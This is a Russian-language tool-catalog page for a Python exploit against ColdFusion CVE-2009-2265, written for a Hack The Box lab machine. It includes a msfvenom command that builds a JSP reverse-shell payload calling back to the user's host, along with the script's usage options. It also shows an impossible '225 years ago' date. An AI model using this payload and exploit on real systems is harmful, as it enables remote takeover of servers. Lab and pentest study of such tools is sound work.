Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
zaphoxx-coldfusion — эксплойт для ColdFusion на основе https://cvedetails.com/cve/CVE-2009-2265/ | Kitploit
Инструменты/GitHubGitHub/zaphoxx/zaphoxx-coldfusion
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubzaphoxx/zaphoxx-coldfusion

zaphoxx-coldfusion

эксплойт для ColdFusion на основе https://cvedetails.com/cve/CVE-2009-2265/

Репозиторий
225 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

zaphoxx-coldfusion

Эксплойт ColdFusion на основе https://cvedetails.com/cve/CVE-2009-2265/

Основной причиной, по которой я написал Python-скрипт для этого конкретного CVE, было то, что версия Metasploit для него не заработала у меня, когда я пытался решить машину Arctic на HTB. Кроме того, было приятно немного попрактиковаться в Python. Однако существует и другая версия этого же эксплойта на Python, изначально созданная Александром Ридом, если вы предпочитаете использовать его версию.

Использование довольно простое:

Убедитесь, что у вас создан файл с полезной нагрузкой

например, с помощью msfvenom: msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp

использование: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]

usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]

необязательные аргументы:

-h, --help показать это справочное сообщение и выйти

-t TARGET целевой IP-адрес

-p PORT целевой порт

-f FILEPATH путь к файлу с шелл-кодом для загрузки

-b BASEPATH базовый путь ColdFusion

Скачать инструмент